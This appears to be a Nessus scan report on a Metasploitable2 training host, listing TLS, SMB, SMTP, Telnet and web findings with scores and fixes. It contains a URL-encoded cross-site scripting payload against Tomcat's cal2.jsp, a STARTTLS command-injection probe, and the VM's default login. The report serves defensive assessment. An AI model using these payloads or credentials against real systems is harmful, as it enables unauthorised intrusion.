6.5 (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L)

4.0

0.0596

5.8 (CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P)

Published: 2010/11/23, Modified: 2023/10/17

IP forwarding appears to be enabled on the remote host.

Detected local MAC Address : 0242ac130004
Response from local MAC Address : 0242ac130004

Detected Gateway MAC Address : 0242ac130002
Response from Gateway MAC Address : 0242ac130002

The configuration of PHP on the remote host allows disclosure of sensitive information.

The PHP install on the remote server is configured in a way that allows disclosure of potentially sensitive information to an attacker through a special URL. Such a URL triggers an Easter egg built into PHP itself.

Other such Easter eggs likely exist, but Nessus has not checked for them.

In the PHP configuration file, php.ini, set the value for 'expose_php' to 'Off' to disable this behavior. Restart the web server daemon to put this change into effect.

Medium

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2010/06/03, Modified: 2022/04/11

Nessus was able to verify the issue using the following URL :

http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

Signing is not required on the remote SMB server.

Signing is not required on the remote SMB server. An unauthenticated, remote attacker can exploit this to conduct man-in-the-middle attacks against the SMB server.

Enforce message signing in the host's configuration. On Windows, this is found in the policy setting 'Microsoft network server: Digitally sign communications (always)'. On Samba, the setting is called 'server signing'. See the 'see also' links for further details.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

4.6 (CVSS:3.0/E:U/RL:O/RC:C)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)

3.7 (CVSS2#E:U/RL:OF/RC:C)

Published: 2012/01/19, Modified: 2022/10/05

The remote mail service allows plaintext command injection while negotiating an encrypted communications channel.

The remote SMTP service contains a software flaw in its STARTTLS implementation that could allow a remote, unauthenticated attacker to inject commands during the plaintext protocol phase that will be executed during the ciphertext protocol phase.

Successful exploitation could allow an attacker to steal a victim's email or associated SASL (Simple Authentication and Security Layer) credentials.

Contact the vendor to see if an update is available.

Medium

7.3

0.6945

4.0 (CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N)

3.1 (CVSS2#E:POC/RL:OF/RC:C)

Published: 2011/03/10, Modified: 2019/03/06

Nessus sent the following two commands in a single packet :

STARTTLS\r\nRSET\r\n

And the server sent the following two responses :

220 2.0.0 Ready to start TLS
250 2.0.0 Ok

The remote SSH server is configured to allow weak encryption algorithms or no algorithm at all.

Nessus has detected that the remote SSH server is configured to use the Arcfour stream cipher or no cipher at all. RFC 4253 advises against using Arcfour due to an issue with weak keys.

Contact the vendor or consult product documentation to remove the weak ciphers.

Medium

4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)

Published: 2016/04/04, Modified: 2016/12/14

The following weak server-to-client encryption algorithms are supported :

arcfour
arcfour128
arcfour256

The following weak client-to-server encryption algorithms are supported :

arcfour
arcfour128
arcfour256

The remote service supports the use of anonymous SSL ciphers.

The remote host supports the use of anonymous SSL ciphers. While this enables an administrator to set up a service that encrypts traffic without having to generate and configure SSL certificates, it offers no way to verify the remote host's identity and renders the service vulnerable to a man-in-the-middle attack.

Note: This is considerably easier to exploit if the attacker is on the same physical network.

Reconfigure the affected application if possible to avoid use of weak ciphers.

Low

5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

5.2 (CVSS:3.0/E:U/RL:O/RC:C)

4.4

0.027

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

1.9 (CVSS2#E:U/RL:OF/RC:C)

Published: 2008/03/28, Modified: 2023/10/27

The following is a list of SSL anonymous ciphers supported by the remote TCP server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The SSL certificate for this service cannot be trusted.

The server's X.509 certificate cannot be trusted. This situation can occur in three different ways, in which the chain of trust can be broken, as stated below :

- First, the top of the certificate chain sent by the server might not be descended from a known public certificate authority. This can occur either when the top of the chain is an unrecognized, self-signed certificate, or when intermediate certificates are missing that would connect the top of the certificate chain to a known public certificate authority.

- Second, the certificate chain may contain a certificate that is not valid at the time of the scan. This can occur either when the scan occurs before one of the certificate's 'notBefore' dates, or after one of the certificate's 'notAfter' dates.

- Third, the certificate chain may contain a signature that either didn't match the certificate's information or could not be verified. Bad signatures can be fixed by getting the certificate with the bad signature to be re-signed by its issuer. Signatures that could not be verified are the result of the certificate's issuer using a signing algorithm that Nessus either does not support or does not recognize.

If the remote host is a public host in production, any break in the chain makes it more difficult for users to verify the authenticity and identity of the web server. This could make it easier to carry out man-in-the-middle attacks against the remote host.

Purchase or generate a proper SSL certificate for this service.

Medium

6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)

Published: 2010/12/15, Modified: 2025/06/16

The following certificate was part of the certificate chain
sent by the remote host, but it has expired :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Not After : Apr 16 14:07:45 2010 GMT

The following certificate was at the top of the certificate
chain sent by the remote host, but it is signed by an unknown
certificate authority :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Issuer : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

The SSL certificate for this service cannot be trusted.

The server's X.509 certificate cannot be trusted. This situation can occur in three different ways, in which the chain of trust can be broken, as stated below :

- First, the top of the certificate chain sent by the server might not be descended from a known public certificate authority. This can occur either when the top of the chain is an unrecognized, self-signed certificate, or when intermediate certificates are missing that would connect the top of the certificate chain to a known public certificate authority.

- Second, the certificate chain may contain a certificate that is not valid at the time of the scan. This can occur either when the scan occurs before one of the certificate's 'notBefore' dates, or after one of the certificate's 'notAfter' dates.

- Third, the certificate chain may contain a signature that either didn't match the certificate's information or could not be verified. Bad signatures can be fixed by getting the certificate with the bad signature to be re-signed by its issuer. Signatures that could not be verified are the result of the certificate's issuer using a signing algorithm that Nessus either does not support or does not recognize.

If the remote host is a public host in production, any break in the chain makes it more difficult for users to verify the authenticity and identity of the web server. This could make it easier to carry out man-in-the-middle attacks against the remote host.

Purchase or generate a proper SSL certificate for this service.

Medium

6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)

Published: 2010/12/15, Modified: 2025/06/16

The following certificate was part of the certificate chain
sent by the remote host, but it has expired :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Not After : Apr 16 14:07:45 2010 GMT

The following certificate was at the top of the certificate
chain sent by the remote host, but it is signed by an unknown
certificate authority :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Issuer : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

The remote server's SSL certificate has already expired.

This plugin checks expiry dates of certificates associated with SSL- enabled services on the target and reports whether any have already expired.

Purchase or generate a new SSL certificate to replace the existing one.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)

Published: 2004/12/03, Modified: 2021/02/03

The SSL certificate has already expired :

Subject : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Issuer : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Not valid before : Mar 17 14:07:45 2010 GMT
Not valid after : Apr 16 14:07:45 2010 GMT

The remote server's SSL certificate has already expired.

This plugin checks expiry dates of certificates associated with SSL- enabled services on the target and reports whether any have already expired.

Purchase or generate a new SSL certificate to replace the existing one.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)

Published: 2004/12/03, Modified: 2021/02/03

The SSL certificate has already expired :

Subject : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Issuer : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Not valid before : Mar 17 14:07:45 2010 GMT
Not valid after : Apr 16 14:07:45 2010 GMT

The SSL certificate for this service is for a different host.

The 'commonName' (CN) attribute of the SSL certificate presented for this service is for a different machine.

Purchase or generate a proper SSL certificate for this service.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)

Published: 2010/04/03, Modified: 2020/04/27

The identities known by Nessus are :

04cbebc48a57
04cbebc48a57.sicurform
172.19.0.2
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

The SSL certificate for this service is for a different host.

The 'commonName' (CN) attribute of the SSL certificate presented for this service is for a different machine.

Purchase or generate a proper SSL certificate for this service.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)

Published: 2010/04/03, Modified: 2020/04/27

The identities known by Nessus are :

04cbebc48a57
04cbebc48a57.sicurform
172.19.0.2
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

The remote host may be affected by a vulnerability that allows a remote attacker to potentially decrypt captured TLS traffic.

The remote host supports SSLv2 and therefore may be affected by a vulnerability that allows a cross-protocol Bleichenbacher padding oracle attack known as DROWN (Decrypting RSA with Obsolete and Weakened eNcryption). This vulnerability exists due to a flaw in the Secure Sockets Layer Version 2 (SSLv2) implementation, and it allows captured TLS traffic to be decrypted. A man-in-the-middle attacker can exploit this to decrypt the TLS connection by utilizing previously captured traffic and weak cryptography along with a series of specially crafted connections to an SSLv2 server that uses the same private key.

Disable SSLv2 and export grade cryptography cipher suites. Ensure that private keys are not used anywhere with server software that supports SSLv2 connections.

Medium

5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

5.2 (CVSS:3.0/E:U/RL:O/RC:C)

3.6

0.8991

4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)

3.2 (CVSS2#E:U/RL:OF/RC:C)

Published: 2016/03/01, Modified: 2025/04/04

The remote host is affected by SSL DROWN and supports the following
vulnerable cipher suites :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote service supports the use of the RC4 cipher.

The remote host supports the use of RC4 in one or more cipher suites.
The RC4 cipher is flawed in its generation of a pseudo-random stream of bytes so that a wide variety of small biases are introduced into the stream, decreasing its randomness.

If plaintext is repeatedly encrypted (e.g., HTTP cookies), and an attacker is able to obtain many (i.e., tens of millions) ciphertexts, the attacker may be able to derive the plaintext.

Reconfigure the affected application, if possible, to avoid use of RC4 ciphers. Consider using TLS 1.2 with AES-GCM suites subject to browser and web server support.

Medium

5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

5.4 (CVSS:3.0/E:U/RL:X/RC:C)

7.3

0.9303

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

4.2 (CVSS2#E:U/RL:ND/RC:C)

Published: 2013/04/05, Modified: 2025/05/09

List of RC4 cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5
RC4-MD5 0x00, 0x04 RSA RSA RC4(128) MD5
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote service supports the use of the RC4 cipher.

The remote host supports the use of RC4 in one or more cipher suites.
The RC4 cipher is flawed in its generation of a pseudo-random stream of bytes so that a wide variety of small biases are introduced into the stream, decreasing its randomness.

If plaintext is repeatedly encrypted (e.g., HTTP cookies), and an attacker is able to obtain many (i.e., tens of millions) ciphertexts, the attacker may be able to derive the plaintext.

Reconfigure the affected application, if possible, to avoid use of RC4 ciphers. Consider using TLS 1.2 with AES-GCM suites subject to browser and web server support.

Medium

5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

5.4 (CVSS:3.0/E:U/RL:X/RC:C)

7.3

0.9303

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

4.2 (CVSS2#E:U/RL:ND/RC:C)

Published: 2013/04/05, Modified: 2025/05/09

List of RC4 cipher suites supported by the remote server :

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The SSL certificate chain for this service ends in an unrecognized self-signed certificate.

The X.509 certificate chain for this service is not signed by a recognized certificate authority. If the remote host is a public host in production, this nullifies the use of SSL as anyone could establish a man-in-the-middle attack against the remote host.

Note that this plugin does not check for certificate chains that end in a certificate that is not self-signed, but is signed by an unrecognized certificate authority.

Purchase or generate a proper SSL certificate for this service.

Medium

6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)

Published: 2012/01/17, Modified: 2022/06/14

The following certificate was found at the top of the certificate
chain sent by the remote host, but is self-signed and was not
found in the list of known certificate authorities :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

The SSL certificate chain for this service ends in an unrecognized self-signed certificate.

The X.509 certificate chain for this service is not signed by a recognized certificate authority. If the remote host is a public host in production, this nullifies the use of SSL as anyone could establish a man-in-the-middle attack against the remote host.

Note that this plugin does not check for certificate chains that end in a certificate that is not self-signed, but is signed by an unrecognized certificate authority.

Purchase or generate a proper SSL certificate for this service.

Medium

6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)

Published: 2012/01/17, Modified: 2022/06/14

The following certificate was found at the top of the certificate
chain sent by the remote host, but is self-signed and was not
found in the list of known certificate authorities :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

The remote service supports the use of weak SSL ciphers.

The remote host supports the use of SSL ciphers that offer weak encryption.

Note: This is considerably easier to exploit if the attacker is on the same physical network.

Reconfigure the affected application, if possible to avoid the use of weak ciphers.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)

Published: 2007/10/08, Modified: 2021/02/03

Here is the list of weak SSL ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote host supports a set of weak ciphers.

The remote host supports EXPORT_RSA cipher suites with keys less than or equal to 512 bits. An attacker can factor a 512-bit RSA modulus in a short amount of time.

A man-in-the middle attacker may be able to downgrade the session to use EXPORT_RSA cipher suites (e.g. CVE-2015-0204). Thus, it is recommended to remove support for weak cipher suites.

Reconfigure the service to remove support for EXPORT_RSA cipher suites.

Medium

1.4

0.9243

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

3.2 (CVSS2#E:U/RL:OF/RC:C)

Published: 2015/03/04, Modified: 2021/02/03

EXPORT_RSA cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote service encrypts traffic using an older version of TLS.

The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a number of cryptographic design flaws. Modern implementations of TLS 1.0 mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are designed against these flaws and should be used whenever possible.

As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 and higher will no longer function properly with major web browsers and major vendors.

PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, 2018, except for POS POI terminals (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits.

Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.

Medium

6.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)

6.1 (CVSS2#AV:N/AC:H/Au:N/C:C/I:P/A:N)

Published: 2017/11/22, Modified: 2023/04/19

TLSv1 is enabled and the server supports at least one cipher.

The remote service encrypts traffic using an older version of TLS.

The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a number of cryptographic design flaws. Modern implementations of TLS 1.0 mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are designed against these flaws and should be used whenever possible.

As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 and higher will no longer function properly with major web browsers and major vendors.

PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, 2018, except for POS POI terminals (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits.

Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.

Medium

6.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)

6.1 (CVSS2#AV:N/AC:H/Au:N/C:C/I:P/A:N)

Published: 2017/11/22, Modified: 2023/04/19

TLSv1 is enabled and the server supports at least one cipher.

The remote web server contains a JSP application that is affected by a cross-site scripting vulnerability.

The remote web server includes an example JSP application, 'cal2.jsp', that fails to sanitize user-supplied input before using it to generate dynamic content. An unauthenticated, remote attacker can exploit this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.

Upgrade to Apache Tomcat version 4.1.40 / 5.5.28 / 6.0.20.
Alternatively, apply the appropriate patch referenced in the vendor advisory or undeploy the Tomcat examples web application.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

2.2

0.2082

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

Published: 2009/03/09, Modified: 2021/01/19

Nessus was able to exploit the issue using the following URL :

http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp?time=8am%20STYLE%3dxss%3ae%2f%2a%2a%2fxpression%28try%7ba%3dfirstTime%7dcatch%28e%29%7bfirstTime%3d1%3balert%28%27tomcat_sample_cal2_xss2.nasl%27%29%7d%29%3b

The remote Telnet server transmits traffic in cleartext.

The remote host is running a Telnet server over an unencrypted channel.

Using Telnet over an unencrypted channel is not recommended as logins, passwords, and commands are transferred in cleartext. This allows a remote, man-in-the-middle attacker to eavesdrop on a Telnet session to obtain credentials or other sensitive information and to modify traffic exchanged between a client and server.

SSH is preferred over Telnet since it protects credentials from eavesdropping and can tunnel additional data streams such as an X11 session.

Disable the Telnet service and use SSH instead.

Medium

6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

5.8 (CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N)

Published: 2009/10/27, Modified: 2024/01/16

Nessus collected the following banner from the remote Telnet server :

------------------------------ snip ------------------------------
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


04cbebc48a57 login:
------------------------------ snip ------------------------------

The remote web server may fail to mitigate a class of web application vulnerabilities.

The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions.

X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors.

Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, with increasing support among all major browser vendors, as a way to mitigate clickjacking and other attacks. The 'frame-ancestors' policy directive restricts which sources can embed the protected resource.

Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only mitigations for clickjacking, they are currently the most reliable methods that can be detected through automation. Therefore, this plugin may produce false positives if other mitigation strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any security-sensitive transactions.

Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response.
This prevents the page's content from being rendered by another site when using the frame or iframe HTML tags.

Medium

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

Published: 2015/08/22, Modified: 2017/05/16

The following pages do not use a clickjacking mitigation response header and contain a clickable event :

- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome

The remote web server may fail to mitigate a class of web application vulnerabilities.

The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions.

X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors.

Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, with increasing support among all major browser vendors, as a way to mitigate clickjacking and other attacks. The 'frame-ancestors' policy directive restricts which sources can embed the protected resource.

Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only mitigations for clickjacking, they are currently the most reliable methods that can be detected through automation. Therefore, this plugin may produce false positives if other mitigation strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any security-sensitive transactions.

Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response.
This prevents the page's content from being rendered by another site when using the frame or iframe HTML tags.

Medium

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

Published: 2015/08/22, Modified: 2017/05/16

The following pages do not use a clickjacking mitigation response header and contain a clickable event :

- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/CookieExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestParamExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/SessionExample

The remote web server contains a PHP script that is prone to an information disclosure attack.

Many PHP installation tutorials instruct the user to create a PHP file that calls the PHP function 'phpinfo()' for debugging purposes. Various PHP applications may also include such a file. By accessing such a file, a remote attacker can discover a large amount of information about the remote web server, including :

- The username of the user who installed PHP and if they are a SUDO user.

- The IP address of the host.

- The version of the operating system.

- The web server version.

- The root directory of the web server.

- Configuration information about the remote PHP installation.

